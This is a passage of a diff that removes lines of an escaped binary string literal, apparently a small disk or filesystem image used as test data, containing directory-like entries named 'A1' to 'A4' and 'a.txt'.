-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x91".
-	        "\x2E\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xCF\xF5\x3C\x00\xE7\x00\x00\x00\x00\x00\x00\xE7\x00\xFB\x00\x00\x00\x00\xFB\x00".
-	        "\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00\x3C\x00\x1A\x00\x00\x00\x00\x00\x00\x1A\x00\xFB\x00\x00\x00\x00".
-	        "\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\xF5\x00\x00\x33\xAE\x72\x9D\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\xF5\xE9\xF4\x1E\x00\xFD\x00\x00\x00\x00\x00\x00\xFD\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00".
-	        "\xF4\x00\x00\xF4\xF4\x00\x1E\x00\x0D\x00\x00\x00\x00\x00\x00\x0D\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5".
-	        "\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\x22\x3F\x5C\x1D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x00\xB3\x00\x55\x00\x3E\xF0\x00".
-	        "\x50\x00\x38\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\xCB\x7F\xB2\x71\x44\xF1\xD1\x51\x98\x3F\x60\xCE\x2A\xC7\x64\x4C\xFF\xC9\x34\xB0".
-	        "\xED\xFC\x24\x18\xA5\xED\x5A\x2E\x51\xE6\x00\x60\x00\x5A\x00\x50\x00\x29\xEA\x00\x61\x00\xC4\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA".
-	        "\x46\xF7\x33\x8D\x6D\xBD\xDA\x9A\xF3\xCE\x9C\xCF\xDE\xC9\x90\x59\x46\xCB\x97\xA2\xE8\x0C\xA3\xE7\x47\xEC\x0F\x29\x7F\x12\x00\xFF".
-	        "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x27\x01\x22\x00\x1B\x00\x00\x00\x00\x00\x00\x1B\x00\x08\x00\x00\x00\x00\x08\x00".
-	        "\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x00\x22\x00\x17\x00\x00\x00\x00\x00\x00\x17\x00\x08\x00\x00\x00\x00".
-	        "\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4B\x96\x3D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x3A\xF5\x3C\x00".
-	        "\x12\x00\x00\x00\x00\x00\x00\x12\x00\xFB\x00\x00\x00\x00\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00".
-	        "\x3C\x00\x1A\x00\x00\x00\x00\x00\x00\x1A\x00\xFB\x00\x00\x00\x00\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5".
-	        "\xF5\xF5\x00\x00\xDD\xA7\x47\xAF\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x1D\xF4\x1E\x00\x09\x00\x00\x00\x00\x00\x00\x09\x00\xF3".
-	        "\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00\xF4\x00\x00\xF4\xF4\x00\x1E\x00\x0D\x00\x00\x00\x00\x00\x00\x0D".
-	        "\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\x96\x31\x7A\xCA\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x99\x00\xB3\x00\x55\x00\x3E\xF0\x00\x50\x00\x38\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\x5D\x82\x21\x0B".
-	        "\x29\xB6\xB9\x91\x98\x3F\x60\xCE\x2A\xC7\x64\xE5\xFF\x13\x34\xC3\x3D\xFC\x4C\x18\x78\xED\xE6\x2E\x88\xE6\x00\x60\x00\x5A\x00\x50".
-	        "\x00\x29\xEA\x00\x61\x00\xC4\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA\xC3\xEF\xCF\xC2\xC8\x24\x06\x54\xF3\xCE\x9C\xCF\xDE\xC9\x90\x05".
-	        "\x46\xE5\x97\xD0\xCD\x0C\x3F\xE7\x6E\xEC\x47\x29\xA7\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x28\x01\x22\x00".
-	        "\x1C\x00\x00\x00\x00\x00\x00\x1C\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x00".
-	        "\x22\x00\x1C\x00\x00\x00\x00\x00\x00\x1C\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01".
-	        "\x01\x01\x26\x00\x1D\x00\x00\x00\x00\x00\x00\x1D\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00".
-	        "\x00\x01\x04\x00\x41\x00\x31\x00\x26\x00\x1E\x00\x00\x00\x00\x00\x00\x1E\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D".
-	        "\xE4\x02\x00\x00\x01\x00\x00\x01\x04\x00\x41\x00\x32\x00\x26\x00\x1F\x00\x00\x00\x00\x00\x00\x1F\x00\x08\x00\x00\x00\x00\x08\x00".
-	        "\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x04\x00\x41\x00\x33\x00\x26\x00\x20\x00\x00\x00\x00\x00\x00\x20\x00\x08".
-	        "\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x04\x00\x41\x00\x34\x00\x2C\x00\x21\x00\x00\x00".
-	        "\x00\x00\x00\x21\x08\x00\x00\x00\x00\x00\x00\x08\x6D\x04\x01\x0E\x32\x24\xE4\x00\x00\x00\x01\x00\x00\x01\x0A\x00\x61\x00\x2E\x00".
-	        "\x74\x00\x78\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
